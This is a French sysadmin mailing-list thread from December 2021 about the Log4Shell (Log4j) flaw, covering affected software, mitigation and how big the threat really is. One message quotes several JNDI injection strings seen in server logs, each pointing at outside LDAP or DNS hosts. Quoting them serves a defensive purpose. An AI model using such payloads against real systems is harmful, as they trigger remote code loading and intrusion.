Dans les logiciels impactés que l'on a du mettre à jour rapidement, tous les Jitsi, c'est du Java en public donc bien vulnérable.

Et même si les Elasticsearch, Greylog et autre joyeuseté y compris du dev de nos clients sont cachés derrière des firewalls on a fait ce qu'il faut pour les logiciels avec des mises à jour et configuration et pour nos clients ont a prévenu et demandé des majs qu'on attend.

Le 14/12/2021 à 10:10, Laurent Barme a écrit :

Bonjour,

Même approche (estimer la portée réelle de la menace avant de s'affoler) et même constat : cette "faille" rejoint la liste des appels à la panique inutiles, du moins pour ce qui me concerne.

Je relève une centaine "d'attaques" (avant blocage automatique), toutes depuis le 10/12/21 sur les Url :

${jndi:ldap://152.89.239.12:1389/bt2f6m}
/$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D
/$%7Bjndi:ldap://167.71.13.196:2222/lx-ffff33fe1d7bbb0100fee1b661000000001ef879%7D
/${jndi:dns:/45.83.64.1/securityscan-http80}
/${jndi:dns:/45.83.64.1/securityscan-https443}
/${jndi:ldap:/45.130.229.168:1389/Exploit}
/${jndi:ldap:/45.83.193.150:1389/Exploit}
/${jndi:ldaps:/a5384.probe001.log4j.leakix.net:8443/b}

qui retournent un 400, 403 ou 404 sur les quelques serveurs que je gère.

A noter que plus de 60% de ces attaques proviennent de 45.83.64.0/32 (Internet Security Research Project), ce qui conforte la suggestion de Maxime à propos des conflits d'intérêt de la part des acteurs œuvrant officiellement pour la lutte contre les pirates.

Cordialement,

Laurent Barme

Le 14/12/2021 à 09:02, Julien Escario a écrit :

Bonjour,

Tentons de reprendre le cours normal de ce thread : j'ai passé la journée d'hier à tenter d'exploiter la faille sur des trucs 'legacy' justement un peu partout et j'ai été très surpris de la faible surface d'attaque que nous avons par rapport aux cris d’orfraies que j'ai pu lire et ici là.

Alors, on a très peu de trucs en Java, langage que je fuis depuis quelques années déjà par respect pour la RAM de mes machines mais en gros, à part Graylog, rien vu à mettre à jour en urgence.

Zimbra, pas touché
Puppet, pas touché
Big Blue Button, pas touché

Unifi est touché à priori mais je n'ai pas réussi à l'exploiter avant de passer -Dlog4j2.formatMsgNoLookups=true

Si quelqu'un veut un test d'exploitation sur un service vulnérable, j'ai un bout de script qui se contente de faire un 'touch /tmp/pwned'

Bonne journée,

Julien


Le 13/12/2021 à 15:18, Seb Astien a écrit :
Qui n'a plus de legacy de nos jours ?

Le lun. 13 déc. 2021 à 14:54, Vincent Habchi <vincent@geomag.fr> a écrit :
> On 13 Dec 2021, at 13:18, David Ponzone <david.ponzone@gmail.com> wrote:
>
> Pour ceux qui l’auraient raté:

Qui utilise encore Apache de nos jours ?

V.

_______________________________________________
Liste de diffusion du FRsAG
http://www.frsag.org/

_______________________________________________
Liste de diffusion du FRsAG
http://www.frsag.org/


_______________________________________________
Liste de diffusion du FRsAG
http://www.frsag.org/


_______________________________________________
Liste de diffusion du FRsAG
http://www.frsag.org/